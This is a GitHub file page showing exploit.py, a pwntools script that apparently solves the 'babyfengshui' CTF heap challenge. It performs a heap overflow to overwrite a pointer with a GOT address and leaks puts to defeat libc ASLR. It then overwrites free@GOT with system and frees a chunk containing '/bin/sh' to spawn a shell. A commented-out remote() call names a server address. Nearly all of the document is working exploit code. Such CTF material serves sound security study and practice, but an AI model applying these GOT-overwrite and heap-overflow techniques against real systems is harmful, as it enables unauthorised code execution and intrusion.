-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathexploit.py
100 lines (78 loc) · 2.13 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
from pwn import *
import os
def add_user(desc_size,name,text_len,text):
msg=p.recvuntil("Action:")
print msg
p.sendline("0")
p.recvuntil(":")
p.sendline(desc_size)
p.recvuntil(":")
p.sendline(name)
p.recvuntil(":")
p.sendline(text_len)
p.recvuntil(":")
p.sendline(text)
def del_user(index):
msg=p.recvuntil("Action:")
print msg
p.sendline("1")
p.recvuntil(":")
p.sendline(index)
def update_user(index,text_len,text):
p.recvuntil("Action:")
p.sendline("3")
p.recvuntil(":")
p.sendline(index)
p.recvuntil(":")
p.sendline(text_len)
p.recvuntil(":")
p.sendline(text)
def display_user(index):
p.recvuntil("Action:")
p.sendline("2")
p.recvuntil(":")
p.sendline(index)
p.recvuntil(":")
name = p.recvline()
print "[+]name :"+name
msg=p.recvuntil(":")
print msg
leak_addr = p.recv(5)
print repr(leak_addr)
leak_addr = leak_addr.split(' ')[1]
context.bits = len(leak_addr)*8
leak_addr = unpack(leak_addr)
return leak_addr
puts_got = 0x0804b024
free_got = 0x0804b010
#os.environ["LD_PRELOAD"] = "libc-2.19.so"
p = gdb.debug("./babyfengshui")
#p= remote("78.46.224.83",1456)
#libc = ELF("./libc-2.19.so")
add_user("128","poorguy","128","DUMMY")
add_user("10","AAAA","4","BBBB")
add_user("128","helperguy","128","DUMMY")
del_user("0")
payload = "A"*288+pack(puts_got)
add_user("256","overwrite","300",payload)
#update_user("1","300",payload)
print "[+] Leaking libc "
puts_leak = display_user("1")
print "[+] Leak addr"+hex(puts_leak)
offset = puts_leak - 0xf7e57950
system_address = 0xf7e30160 + offset
shell_address = 0xf7f545db + offset
print "[+] system addr"+str(hex(system_address))
print "[+] shell addr "+str(hex(shell_address))
add_user("128","poorguy","128","DUMMY") # 4 th guy
add_user("10","AAAA","4","BBBB")
add_user("128","helperguy","128","/bin/sh\x00")
del_user("4")
payload = "C"*288+pack(free_got)
print "[+] Adding user"
add_user("256","overwrite","300",payload)
update_user("5","8",pack(system_address))
print "[+] Deleting user"
del_user("6")
p.interactive()
#raw_input()